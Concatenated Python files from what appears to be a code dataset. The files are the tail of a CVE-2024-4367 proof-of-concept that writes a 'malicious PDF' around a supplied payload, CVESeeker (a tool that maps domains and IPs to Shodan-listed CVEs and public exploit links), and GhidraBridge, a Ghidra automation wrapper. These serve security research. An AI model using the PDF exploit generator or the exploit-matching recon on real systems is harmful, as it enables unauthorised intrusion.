/PatternType 1
/Matrix[1 0 0 1 50 0]
/Length 58
/TilingType 1
/BBox[0 0 16 16]
/YStep 16
/PaintType 1
/Resources<<
>>
/XStep 16
>>
stream
0.65 g
0 0 16 16 re f
0.15 g
0 0 8 8 re f
8 8 8 8 re f
endstream
endobj
4 0 obj
<<
/Pattern<<
/P1 7 0 R
/P2 8 0 R
>>
/Font<<
/F1 5 0 R
>>
>>
endobj
1 0 obj
<<
/Pages 2 0 R
/Type/Catalog
/OpenAction[3 0 R /Fit]
>>
endobj
xref
0 11
0000000000 65535 f
0000002260 00000 n
0000000522 00000 n
0000000973 00000 n
0000002178 00000 n
0000000266 00000 n
0000000794 00000 n
0000001953 00000 n
0000000015 00000 n
0000000577 00000 n
0000001085 00000 n
trailer
<<
/ID[(DUMMY) (DUMMY)]
/Root 1 0 R
/Size 11
>>
startxref
2333
%%EOF
"""
if __name__ == "__main__":
    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print(f"Usage: {sys.argv[0]} <payload>")
        print(f"or Usage: {sys.argv[0]} <payload> <filename>")
        sys.exit(1)
    payload = generate_payload(sys.argv[1])
    out = "poc.pdf"
    if len(sys.argv) == 3:
        out = sys.argv[2]
    with open(out, "w") as f:
        f.write(payload)
    print("[+] Created malicious PDF file: " + out)
    print("[+] Open the file with the vulnerable application to trigger the exploit.")
    sys.exit(0) | 2,724 | Python | .py | 172 | 12.988372 | 97 | 0.639686 | Zombie-Kaiser/cve-2024-4367-PoC-fixed | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,106 | cveSeeker.py | anmolksachan_CVESeeker/cveSeeker.py | import socket
import requests
import os
import json
import argparse
from colorama import init, Fore, Style
# Initialize colorama
init(autoreset=True)
print(Fore.CYAN + """
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░ ░▒▓███████▓▒░▒▓████████▓▒░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓██████▓▒░ ░▒▓██▓▒░ ░▒▓████████▓▒░ ░▒▓███████▓▒░▒▓████████▓▒░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
Unveiling Cyber Threats: From assets to Vulnerability Insights
Coded with Love by Anmol K Sachan @FR13ND0x7F Version 2.0
""" + Style.RESET_ALL)
# Define the argument parser
parser = argparse.ArgumentParser(description="Fetch domain IPs, open ports, CVEs, and POCs")
parser.add_argument('--file', help="Input file containing domains and IPs")
parser.add_argument('--project', help="Project name for storing results")
parser.add_argument('--cve', help="CVE ID for fetching POCs")
args = parser.parse_args()
# Create output folder structure
def create_output_directory(project_name):
output_dir = os.path.join("LastScans", project_name)
os.makedirs(output_dir, exist_ok=True)
return output_dir
# Function to fetch and return POCs for a given CVE
def fetch_pocs_for_cve(cve_id):
try:
response = requests.get(f"https://poc-in-github.motikan2010.net/api/v1/?cve_id={cve_id}")
if response.status_code == 200:
return response.json().get('pocs', [])
else:
print(Fore.RED + f"[-] Failed to fetch POCs for {cve_id}")
except requests.RequestException as e:
print(Fore.RED + f"[-] Error fetching POCs: {e}")
return []
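# Illustrative usage sketch (not part of the original script): fetch_pocs_for_cve()
# can also be called on its own; the CVE id below is only an example.
def _example_fetch_pocs():
    for poc in fetch_pocs_for_cve("CVE-2021-44228"):  # example CVE id
        print(poc.get('html_url'))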
# Function to fetch POCs and print them, now including storing relevant assets
def fetch_pocs_and_print(ip, hostnames, cve_info):
found_cve_count = 0
total_cve_count = len(cve_info)
for cve in cve_info:
pocs = fetch_pocs_for_cve(cve)
if pocs:
found_cve_count += 1
print(Fore.CYAN + f"[+] Found POC for {cve}")
print(Fore.YELLOW + " [+] Links:")
for poc in pocs:
print(Fore.YELLOW + f" - {poc['html_url']}")
if cve not in cve_data:
cve_data[cve] = {'assets': [], 'pocs': []}
cve_data[cve]['assets'].append(ip)
cve_data[cve]['pocs'].extend([poc['html_url'] for poc in pocs])
if found_cve_count > 0:
print(Fore.YELLOW + f"[[+] Found] [{found_cve_count}/{total_cve_count}] for asset {ip}")
# Create JSON and HTML reports
def create_reports(output_dir, domain_ip_mapping, alive_domains, not_reachable_domains, cve_data, open_ports_mapping):
# JSON output
output_json = {
"alive_assets": {domain: {"ip": ip, "open_ports": open_ports_mapping[domain]} for domain, ip in domain_ip_mapping.items() if domain in alive_domains},
"dead_assets": {domain: None for domain in not_reachable_domains},
"cve_data": {}
}
for cve, data in cve_data.items():
output_json['cve_data'][cve] = {
'assets': data['assets'],
'pocs': data['pocs']
}
json_file_path = os.path.join(output_dir, "report.json")
with open(json_file_path, 'w') as json_file:
json.dump(output_json, json_file, indent=4)
# HTML output
html_content = f"""
<html>
<head>
<title>Scan Report</title>
<style>
body {{
font-family: Arial, sans-serif;
margin: 20px;
background-color: #f4f4f4;
color: #333;
}}
h2 {{
color: #0056b3;
}}
input[type="text"] {{
width: 300px;
padding: 10px;
margin-bottom: 20px;
border: 1px solid #ccc;
border-radius: 4px;
}}
table {{
border-collapse: collapse;
width: 100%;
margin-bottom: 20px;
background-color: #fff;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
}}
th, td {{
border: 1px solid #dddddd;
text-align: left;
padding: 12px;
}}
th {{
background-color: #007bff;
color: white;
}}
tr:nth-child(even) {{
background-color: #f2f2f2;
}}
tr:hover {{
background-color: #e9ecef;
}}
</style>
<script>
function search() {{
var input = document.getElementById("search").value.toLowerCase();
var rows = document.querySelectorAll("table tr");
rows.forEach(row => {{
if (row.textContent.toLowerCase().includes(input)) {{
row.style.display = "";
}} else {{
row.style.display = "none";
}}
}});
}}
</script>
</head>
<body>
<h2>Scan Report</h2>
<input type="text" id="search" onkeyup="search()" placeholder="Search Report...">
<h3>Statistics</h3>
<table>
<tr><th>Statistic</th><th>Value</th></tr>
<tr><td>Domains Found</td><td>{len(domain_ip_mapping)}</td></tr>
<tr><td>IP Found</td><td>{total_ips}</td></tr>
<tr><td>Alive Domains</td><td>{len(alive_domains)}</td></tr>
<tr><td>Not Reachable</td><td>{len(not_reachable_domains)}</td></tr>
<tr><td>Total IP</td><td>{total_ips}</td></tr>
<tr><td>Duplicates</td><td>{duplicates}</td></tr>
<tr><td>Unique IPs</td><td>{unique_ip_count}</td></tr>
</table>
<h3>CVE Data</h3>
<table>
<tr><th>CVE</th><th>Assets</th><th>POCs</th></tr>
{''.join([
f'<tr><td>{cve}</td><td>{", ".join(data["assets"])}</td><td>{", ".join(data["pocs"])}</td></tr>'
for cve, data in output_json['cve_data'].items()
])}
</table>
<h3>Alive Assets</h3>
<table>
<tr><th>Domain</th><th>IP</th><th>Open Ports</th></tr>
{''.join([f'<tr><td>{domain}</td><td>{ip_info["ip"]}</td><td>{", ".join(map(str, ip_info["open_ports"]))}</td></tr>' for domain, ip_info in output_json['alive_assets'].items()])}
</table>
<h3>Dead Assets</h3>
<table>
<tr><th>Domain</th><th>Status</th></tr>
{''.join([f'<tr><td>{domain}</td><td>Not Reachable</td></tr>' for domain in output_json['dead_assets']])}
</table>
<h3>Scope Details</h3>
<table>
<tr><th>Scope</th></tr>
"""
# Read the input file directly to include in the HTML
if input_file:
try:
with open(input_file, 'r') as f:
scope_lines = f.readlines()
for scope in scope_lines:
html_content += f'<tr><td>{scope.strip()}</td></tr>'
except FileNotFoundError:
print(f"[-] The file {input_file} does not exist.")
html_content += '<tr><td colspan="1">Scope file not found.</td></tr>' # Provide feedback in the report
html_content += """
</table>
</body>
</html>
"""
html_file_path = os.path.join(output_dir, "report.html")
with open(html_file_path, 'w') as html_file:
html_file.write(html_content)
# Main execution
if args.cve:
pocs = fetch_pocs_for_cve(args.cve)
if pocs:
for poc in pocs:
print(Fore.CYAN + f" {poc['html_url']}")
elif args.file and args.project:
input_file = args.file
project_name = args.project
output_dir = create_output_directory(project_name)
# Initialize counters and storage
domains = set()
ips = set()
alive_domains = set()
not_reachable_domains = set()
domain_ip_mapping = {}
open_ports_mapping = {}
unique_ips = set()
global cve_data
cve_data = {} # Initialize global cve_data
# Read input file
try:
with open(input_file, 'r') as file:
lines = file.readlines()
for line in lines:
item = line.strip()
if item:
if item.replace('.', '').isdigit(): # Basic check for IP
ips.add(item)
else:
domains.add(item)
print(Fore.YELLOW + f"-------------Stats-------------")
print(Fore.GREEN + f"[+] Domains Found: {len(domains)}")
print(Fore.GREEN + f"[+] IP Found: {len(ips)}")
# Resolve domains to IPs
for domain in domains:
try:
ip = socket.gethostbyname(domain)
domain_ip_mapping[domain] = ip
alive_domains.add(domain)
unique_ips.add(ip)
open_ports_mapping[domain] = [] # Initialize open ports for the domain
except socket.error:
not_reachable_domains.add(domain)
# Logging results
print(Fore.GREEN + f"[+] Alive domains: {len(alive_domains)}")
print(Fore.RED + f"[+] Not reachable: {len(not_reachable_domains)}")
# Combine user-provided IPs and resolved IPs, removing duplicates
all_ips = ips.union(unique_ips)
total_ips = len(all_ips)
duplicates = len(ips) + len(unique_ips) - total_ips
unique_ip_count = len(all_ips)
print(Fore.GREEN + f"[+] Total IP: {total_ips}")
print(Fore.YELLOW + f"[+] Duplicates: {duplicates}")
print(Fore.GREEN + f"[+] Unique: {unique_ip_count}")
print(Fore.YELLOW + f"-------------------------------")
# Fetch CVEs for each IP
#print(Fore.YELLOW + "\n[+] Looking for CVEs")
for ip in all_ips:
try:
response = requests.get(f"https://internetdb.shodan.io/{ip}")
if response.status_code == 200:
data = response.json()
open_ports = data.get('ports', [])
cve_info = data.get('vulns', [])
hostnames = data.get('hostnames', [])
hostname_str = f"({'/'.join(hostnames)})" if hostnames else ''
if open_ports:
print(Fore.GREEN + f"[+] {ip}{hostname_str} (Open Ports): {', '.join(map(str, open_ports))}")
# Update open ports mapping
for domain in domain_ip_mapping:
if domain_ip_mapping[domain] == ip:
open_ports_mapping[domain] = open_ports
if cve_info:
print(Fore.RED + f"[+] {ip}{hostname_str} (Vulnerabilities): {', '.join(cve_info)}")
fetch_pocs_and_print(ip, hostnames, cve_info)
else:
print(Fore.YELLOW + f"[+] {ip}{hostname_str} (No Vulnerabilities found)")
else:
print(Fore.RED + f"[-] Failed to fetch data for {ip} with status code: {response.status_code}")
except requests.RequestException as e:
print(Fore.RED + f"[-] Error fetching data for {ip}: {e}")
# Create JSON and HTML reports
create_reports(output_dir, domain_ip_mapping, alive_domains, not_reachable_domains, cve_data, open_ports_mapping)
except FileNotFoundError:
print(Fore.RED + f"[-] Input file not found: {input_file}")
except Exception as e:
print(Fore.RED + f"[-] An error occurred: {e}")
else:
parser.print_help()
| 13,971 | Python | .py | 278 | 33.507194 | 217 | 0.487869 | anmolksachan/CVESeeker | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,107 | setup.py | user1342_GhidraBridge/setup.py | from setuptools import setup, find_packages
setup(
name="ghidrabridge",
version="0.1.11",
author="James Stevenson",
author_email="[email protected]",
description="A Python interface for automating Ghidra tasks.",
long_description_content_type="text/markdown",
url="https://github.com/user1342/GhidraBridge",
packages=find_packages(),
install_requires=[
"tqdm",
],
python_requires='>=3.6',
)
| 455 | Python | .py | 15 | 25.8 | 66 | 0.699317 | user1342/GhidraBridge | 8 | 5 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,108 | test.py | user1342_GhidraBridge/test.py | from ghidrabridge.ghidra_bridge import GhidraBridge
bridge = GhidraBridge()
#
print(bridge.get_list_of_reachable_functions(r"C:\Users\james\Downloads\linux-static-binaries-master\linux-static-binaries-master\armv8-aarch64 - Copy\pure-authd","FUN_004002c8"))
| 259 | Python | .py | 4 | 63.5 | 179 | 0.822835 | user1342/GhidraBridge | 8 | 5 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,109 | ghidra_bridge.py | user1342_GhidraBridge/ghidrabridge/ghidra_bridge.py | import concurrent
import hashlib
import shutil
import subprocess
import tempfile
from concurrent.futures import ProcessPoolExecutor
from pathlib import Path
from tqdm import tqdm
import re
class GhidraBridge():
def __init__(self, ghidra_project_dir=None, cspec=None, processor=None):
self.ghidra_project_dir = ghidra_project_dir
self.cspec = cspec
self.processor = processor
def brute_force_processor(self, binary):
list_of_processors = self.list_all_possible_processors()
valid_processors = []
for processor in list_of_processors:
bridge = GhidraBridge(processor=processor)
functions = bridge.get_all_function_names_and_addresses(binary)
if functions != {}:
valid_processors.append(processor)
return valid_processors
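# Illustrative usage sketch (not part of the original class): brute-forcing the
# processor/language id for a binary whose architecture is unknown. The binary
# path is a placeholder.
#
#   bridge = GhidraBridge()
#   candidates = bridge.brute_force_processor("/tmp/unknown_firmware.bin")
#   print("processor specs that produced functions:", candidates)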
def list_all_possible_processors(self):
return ['6502:LE:16:default',
'65C02:LE:16:default',
'68000:BE:32:default',
'68000:BE:32:MC68030',
'68000:BE:32:MC68020',
'68000:BE:32:Coldfire',
'8048:LE:16:default',
'8051:BE:16:default',
'80251:BE:24:default',
'80390:BE:24:default',
'8051:BE:24:mx51',
'8085:LE:16:default',
'AARCH64:LE:64:v8A',
'AARCH64:BE:64:v8A',
'AARCH64:LE:32:ilp32',
'AARCH64:BE:32:ilp32',
'AARCH64:LE:64:AppleSilicon',
'ARM:LE:32:v8',
'ARM:LE:32:v8T',
'ARM:LEBE:32:v8LEInstruction',
'ARM:BE:32:v8',
'ARM:BE:32:v8T',
'ARM:LE:32:v7',
'ARM:LEBE:32:v7LEInstruction',
'ARM:BE:32:v7',
'ARM:LE:32:Cortex',
'ARM:BE:32:Cortex',
'ARM:LE:32:v6',
'ARM:BE:32:v6',
'ARM:LE:32:v5t',
'ARM:BE:32:v5t',
'ARM:LE:32:v5',
'ARM:BE:32:v5',
'ARM:LE:32:v4t',
'ARM:BE:32:v4t',
'ARM:LE:32:v4',
'ARM:BE:32:v4',
'avr32:BE:32:default',
'avr8:LE:16:default',
'avr8:LE:16:extended',
'avr8:LE:16:atmega256',
'avr8:LE:24:xmega',
'CP1600:BE:16:default',
'CR16C:LE:16:default',
'Dalvik:LE:32:default',
'Dalvik:LE:32:DEX_Base',
'Dalvik:LE:32:DEX_KitKat',
'Dalvik:LE:32:ODEX_KitKat',
'Dalvik:LE:32:DEX_Lollipop',
'Dalvik:LE:32:Marshmallow',
'Dalvik:LE:32:DEX_Nougat',
'Dalvik:LE:32:DEX_Oreo',
'Dalvik:LE:32:DEX_Pie',
'Dalvik:LE:32:DEX_Android10',
'Dalvik:LE:32:DEX_Android11',
'Dalvik:LE:32:DEX_Android12',
'Dalvik:LE:32:DEX_Android13',
'DATA:LE:64:default',
'DATA:BE:64:default',
'HC05:BE:16:default',
'HC05:BE:16:M68HC05TB',
'HC08:BE:16:default',
'HC08:BE:16:MC68HC908QY4',
'HCS08:BE:16:default',
'HCS08:BE:16:MC9S08GB60',
'HC-12:BE:16:default',
'HCS-12:BE:24:default',
'HCS-12X:BE:24:default',
'HCS12:BE:24:default',
'JVM:BE:32:default',
'M8C:BE:16:default',
'6809:BE:16:default',
'H6309:BE:16:default',
'6805:BE:16:default',
'MCS96:LE:16:default',
'MIPS:BE:32:default',
'MIPS:LE:32:default',
'MIPS:BE:32:R6',
'MIPS:LE:32:R6',
'MIPS:BE:64:default',
'MIPS:LE:64:default',
'MIPS:BE:64:micro',
'MIPS:LE:64:micro',
'MIPS:BE:64:R6',
'MIPS:LE:64:R6',
'MIPS:BE:64:64-32addr',
'MIPS:LE:64:64-32addr',
'MIPS:LE:64:micro64-32addr',
'MIPS:BE:64:micro64-32addr',
'MIPS:BE:64:64-32R6addr',
'MIPS:LE:64:64-32R6addr',
'MIPS:BE:32:micro',
'MIPS:LE:32:micro',
'pa-risc:BE:32:default',
'PIC-12:LE:16:PIC-12C5xx',
'PIC-16:LE:16:PIC-16',
'PIC-16:LE:16:PIC-16F',
'PIC-16:LE:16:PIC-16C5x',
'PIC-17:LE:16:PIC-17C7xx',
'PIC-18:LE:24:PIC-18',
'PIC-24E:LE:24:default',
'PIC-24F:LE:24:default',
'PIC-24H:LE:24:default',
'dsPIC30F:LE:24:default',
'dsPIC33F:LE:24:default',
'dsPIC33E:LE:24:default',
'dsPIC33C:LE:24:default',
'PowerPC:BE:32:default',
'PowerPC:LE:32:default',
'PowerPC:BE:64:default',
'PowerPC:BE:64:64-32addr',
'PowerPC:LE:64:64-32addr',
'PowerPC:LE:64:default',
'PowerPC:BE:32:4xx',
'PowerPC:LE:32:4xx',
'PowerPC:BE:32:MPC8270',
'PowerPC:BE:32:QUICC',
'PowerPC:LE:32:QUICC',
'PowerPC:BE:32:e500',
'PowerPC:LE:32:e500',
'PowerPC:BE:64:A2-32addr',
'PowerPC:LE:64:A2-32addr',
'PowerPC:BE:64:A2ALT-32addr',
'PowerPC:LE:64:A2ALT-32addr',
'PowerPC:BE:64:A2ALT',
'PowerPC:LE:64:A2ALT',
'PowerPC:BE:64:VLE-32addr',
'PowerPC:BE:64:VLEALT-32addr',
'RISCV:LE:64:RV64I',
'RISCV:LE:64:RV64IC',
'RISCV:LE:64:RV64G',
'RISCV:LE:64:RV64GC',
'RISCV:LE:64:default',
'RISCV:LE:32:RV32I',
'RISCV:LE:32:RV32IC',
'RISCV:LE:32:RV32IMC',
'RISCV:LE:32:RV32G',
'RISCV:LE:32:RV32GC',
'RISCV:LE:32:default',
'sparc:BE:32:default',
'sparc:BE:64:default',
'SuperH:BE:32:SH-2A',
'SuperH:BE:32:SH-2',
'SuperH:BE:32:SH-1',
'SuperH4:BE:32:default',
'SuperH4:LE:32:default',
'TI_MSP430:LE:16:default',
'TI_MSP430X:LE:32:default',
'tricore:LE:32:default',
'tricore:LE:32:tc29x',
'tricore:LE:32:tc172x',
'tricore:LE:32:tc176x',
'V850:LE:32:default',
'x86:LE:32:default',
'x86:LE:32:System Management Mode',
'x86:LE:16:Real Mode',
'x86:LE:16:Protected Mode',
'x86:LE:64:default',
'z80:LE:16:default',
'z8401x:LE:16:default',
'z180:LE:16:default',
'z182:LE:16:default']
def _execute_blocking_command(self, command_as_list):
if command_as_list != None:
#print("Executing command: {}".format(command_as_list))
result = subprocess.run(command_as_list, capture_output=False, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
return result
def generate_script_for_getting_registers_for_function(self, target_function):
script = """from ghidra.app.emulator import EmulatorHelper
from ghidra.program.model.symbol import SymbolUtilities
# Tested with Ghidra v9.1 and v9.1.1, future releases are likely to simplify
# and/or expand the EmulatorHelper class in the API.
# == Helper functions ======================================================
def getAddress(offset):
return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)
def getSymbolAddress(symbolName):
symbol = SymbolUtilities.getLabelOrFunctionSymbol(currentProgram, symbolName, None)
if (symbol != None):
return symbol.getAddress()
else:
raise("Failed to locate label: {}".format(symbolName))
def getProgramRegisterList(currentProgram):
pc = currentProgram.getProgramContext()
return pc.registers
# == Main function =========================================================
def main():
CONTROLLED_RETURN_OFFSET = 0
# Identify function to be emulated
mainFunctionEntry = getSymbolAddress("<function>")
# Establish emulation helper, please check out the API docs
# for `EmulatorHelper` - there's a lot of helpful things
# to help make architecture agnostic emulator tools.
emuHelper = EmulatorHelper(currentProgram)
# Set controlled return location so we can identify return from emulated function
controlledReturnAddr = getAddress(CONTROLLED_RETURN_OFFSET)
# Set initial RIP
mainFunctionEntryLong = int("0x{}".format(mainFunctionEntry), 16)
emuHelper.writeRegister(emuHelper.getPCRegister(), mainFunctionEntryLong)
# For x86_64 `registers` contains 872 registers! You probably don't
# want to print all of these. Just be aware, and print what you need.
# To see all supported registers. just print `registers`.
# We won't use this, it's just here to show you how to query
# valid registers for your target architecture.
registers = getProgramRegisterList(currentProgram)
print("registers_start")
print(registers)
print("registers_end")
# Cleanup resources and release hold on currentProgram
emuHelper.dispose()
# == Invoke main ===========================================================
main()""".replace("<function>",target_function)
return script
def generate_function_rename_script(seld, old_function_name, new_function_name):
script = """# Import the necessary Ghidra modules
from ghidra.program.model.listing import FunctionManager
from ghidra.util.exception import DuplicateNameException
from ghidra.util.exception import InvalidInputException
from ghidra.program.model.symbol import RefType, SymbolType
# Get the current program
program = getCurrentProgram()
# Get the function manager for the current program
function_manager = program.getFunctionManager()
def get_function_by_name(name):
symbol_table = currentProgram.getSymbolTable()
symbols = symbol_table.getSymbols(name)
for symbol in symbols:
if symbol.getSymbolType() == SymbolType.FUNCTION:
return getFunctionAt(symbol.getAddress())
return None
def rename_function(function, new_name):
try:
# Rename the function
function.setName(new_name, ghidra.program.model.symbol.SourceType.USER_DEFINED)
except DuplicateNameException as e:
print("Error: Duplicate function name - {}".format(e))
except InvalidInputException as e:
print("Error: Invalid input - {}".format(e))
except Exception as e:
print("An unexpected error occurred: {}".format(e))
# Example usage:
# Specify the address of the function you want to rename
function_address = get_function_by_name("<old_name>") # Change this to the current name of the function you want to rename
new_function_name = "<new_name>" # Change this to the new name you want to assign
# Rename the function
rename_function(function_address, new_function_name)""".replace("<old_name>",f"{old_function_name}").replace("<new_name>",f"{new_function_name}")
return script
def generate_control_flow_script(self, function_name):
script = """from ghidra.program.model.symbol import RefType, SymbolType
from ghidra.util.task import ConsoleTaskMonitor
from ghidra.program.model.address import Address
from ghidra.program.model.block import BasicBlockModel, CodeBlockReferenceIterator
from ghidra.program.model.pcode import PcodeOp
def get_function_by_name(name):
symbol_table = currentProgram.getSymbolTable()
symbols = symbol_table.getSymbols(name)
for symbol in symbols:
if symbol.getSymbolType() == SymbolType.FUNCTION:
return getFunctionAt(symbol.getAddress())
return None
def find_reachable_functions(function):
monitor = ConsoleTaskMonitor()
called_functions = set()
to_process = [function]
while to_process:
current_function = to_process.pop()
if current_function in called_functions:
continue
called_functions.add(current_function)
# Get the instructions in the function
listing = currentProgram.getListing()
instructions = listing.getInstructions(current_function.getBody(), True)
for instruction in instructions:
if instruction.getFlowType().isCall():
called_func = getFunctionAt(instruction.getFlows()[0])
if called_func and called_func not in called_functions:
to_process.append(called_func)
return called_functions
def main():
function_name = <name>
function = get_function_by_name(function_name)
if function is None:
print("Function "+function_name+" not found.")
return
reachable_functions = find_reachable_functions(function)
print("***")
for func in reachable_functions:
print(" "+func.getName())
print("***")
if __name__ == "__main__":
main()
""".replace("<name>",f"'{function_name}'")
return script
def generate_get_cross_references_to_function_name(self,name):
script = """fm = currentProgram.getFunctionManager()
funcs = fm.getFunctions(True)
for func in funcs:
if func.getName() == "<name>":
print("Found '<name>' @ 0x{}".format(func.getEntryPoint()))
entry_point = func.getEntryPoint()
references = getReferencesTo(entry_point)
for xref in references:
print(xref)""".replace("<name>", name)
return script
def generate_decom_for_function(self, function_name):
script = """from ghidra.app.decompiler import DecompInterface
from ghidra.util.task import ConsoleTaskMonitor
program = getCurrentProgram()
ifc = DecompInterface()
ifc.openProgram(program)
# here we assume there is only one function named `main`
function = getGlobalFunctions('<name>')[0]
# decompile the function and print the pseudo C
results = ifc.decompileFunction(function, 0, ConsoleTaskMonitor())
print(results.getDecompiledFunction().getC())""".replace("<name>", function_name)
return script
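# Illustrative usage sketch (not part of the original class): the returned script
# text is intended to be written to a .py file and run under analyzeHeadless, for
# example via start_headless_with_script(). The paths below are placeholders.
#
#   bridge = GhidraBridge()
#   script_text = bridge.generate_decom_for_function("main")
#   with open("/tmp/decom_main.py", "w") as fh:
#       fh.write(script_text)
#   bridge.start_headless_with_script("/tmp/target.bin", "/tmp/decom_main.py")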
def generate_get_function_address_by_name(self, name):
script = """# Note that multiple functions can share the same name, so Ghidra's API
# returns a list of `Function` types. Just keep this in mind.
name = "<name>"
funcs = getGlobalFunctions(name)
print("Found {} function(s) with the name '{}'".format(len(funcs), name))
for func in funcs:
print("{} is located at 0x{}".format(func.getName(), func.getEntryPoint()))""".replace("<name>", name)
return script
def generate_get_function_names_and_address(self):
script = """fm = currentProgram.getFunctionManager()
funcs = fm.getFunctions(True) # True means 'forward'
for func in funcs:
print("Function: {} - Address: 0x{}".format(func.getName(), func.getEntryPoint()))"""
return script
def generate_get_a_function_name_by_address(self, address):
script = """# helper function to get a Ghidra Address type
def getAddress(offset):
return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)
# get a FunctionManager reference for the current program
functionManager = currentProgram.getFunctionManager()
# getFunctionAt() only works with function entryPoint addresses!
# returns `None` if address is not the address of the first
# instruction in a defined function. Consider using
# getFunctionContaining() method instead.
addr = getAddress(<address>)
funcName = functionManager.getFunctionAt(addr).getName()
print(funcName)""".replace("<address>",address)
return script
def generate_ghidra_decom_script(self, path_to_save_decoms_to, file_to_save_script_to):
script = """# SaveFunctions.py
# Import necessary Ghidra modules
from ghidra.program.model.listing import Function
from ghidra.util.task import TaskMonitor
from ghidra.app.decompiler import DecompInterface
import os
import time
import re
# Function to save the decompiled C code of a function to a file
def save_function_c_code(function, output_directory):
function_name = function.getName()
function_c_code = decompile_function_to_c_code(function)
# Create the output directory if it doesn't exist
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# Save the C code to a file
current_epoch_time = int(time.time())
# Combine the elements to create the file path
output_file_path = os.path.join(
output_directory,
re.sub(r'[^\w\-\.\\/]', '_', "{}__{}__{}.c".format(
function.getProgram().getName(),
function_name,
int(time.time())
))
)
with open(output_file_path, 'w') as output_file:
output_file.write(function_c_code)
# Function to decompile a function to C code
def decompile_function_to_c_code(function):
decompiler = get_decompiler(function.getProgram())
result = decompiler.decompileFunction(function, 0, TaskMonitor.DUMMY)
try:
return result.getDecompiledFunction().getC()
except:
return ""
# Function to get the decompiler for the current program
def get_decompiler(program):
decompiler_options = program.getOptions("Decompiler")
decompiler_id = decompiler_options.getString("decompiler", "ghidra")
decompiler = DecompInterface()
decompiler.openProgram(program)
return decompiler
# Main function to iterate through all functions and save their C code
def save_all_functions_to_files():
current_program = getCurrentProgram()
listing = current_program.getListing()
# Specify the output directory
output_directory = r"<PATH>"
# Iterate through all functions
for function in listing.getFunctions(True):
function_name = function.getName()
save_function_c_code(function, output_directory)
# Run the main function
save_all_functions_to_files()
""".replace("<PATH>", path_to_save_decoms_to)
with open(file_to_save_script_to, "w") as file:
file.write(script)
def _check_if_ghidra_project_exists(self, project_folder, project_name):
project_folder_path = Path(project_folder, project_name + ".gpr")
return project_folder_path.exists()
def start_headless_with_script(self, path_to_binary, path_to_script):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "decom_script.py").resolve()
self._construct_ghidra_headless_command(path_to_binary, path_to_script, binary_hash)
def _construct_ghidra_headless_command(self, binary_path, script_path, binary_hash):
binary_name = "analyzeHeadless.bat"
# Check if the binary is on the PATH
headless = shutil.which(binary_name)
temp_script_path = Path(script_path)
temp_script_dir = temp_script_path.parent
Path(temp_script_dir).resolve()
if headless is not None:
pass#print(f"{binary_name} found at: {headless}")
else:
binary_name = "analyzeHeadless"
# Check if the binary is on the PATH
headless = shutil.which(binary_name)
if headless is None:
# Binary not found, prompt user to provide the path
user_provided_path = input(f"{binary_name} not found on the PATH. Please provide the full path: ")
# Verify if the provided path is valid
if shutil.which(user_provided_path) is not None:
headless = user_provided_path
print(f"{binary_name} found at: {headless}")
else:
raise Exception(f"Error: {binary_name} not found at the provided path.")
tmp_dir = None
if not self.ghidra_project_dir:
tmp_dir = tempfile.TemporaryDirectory()
ghidra_project_dir = tmp_dir.name
else:
ghidra_project_dir = self.ghidra_project_dir
if self._check_if_ghidra_project_exists(ghidra_project_dir, binary_hash):
#print("Processing existing project")
commandStr = [
headless,
ghidra_project_dir,
binary_hash,
"-process",
"-scriptPath",
temp_script_dir,
"-postScript",
temp_script_path.name
]
else:
#print("Importing new project")
commandStr = [
headless,
ghidra_project_dir,
binary_hash,
"-import",
binary_path,
"-scriptPath",
temp_script_dir,
"-postScript",
temp_script_path.name
]
if self.cspec != None:
commandStr = commandStr + [
"-cspec",
self.cspec
]
if self.processor != None:
commandStr = commandStr + [
"-processor",
self.processor
]
resp = self._execute_blocking_command(commandStr)
if tmp_dir:
tmp_dir.cleanup()
# Run Ghidra headless command
return resp
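# Illustrative sketch of the command assembled above (placeholder paths, not real output):
#   analyzeHeadless <project_dir> <sha256> -import <binary_path> -scriptPath <script_dir> -postScript <script_name>
# is used the first time a binary is seen, while an existing project swaps the
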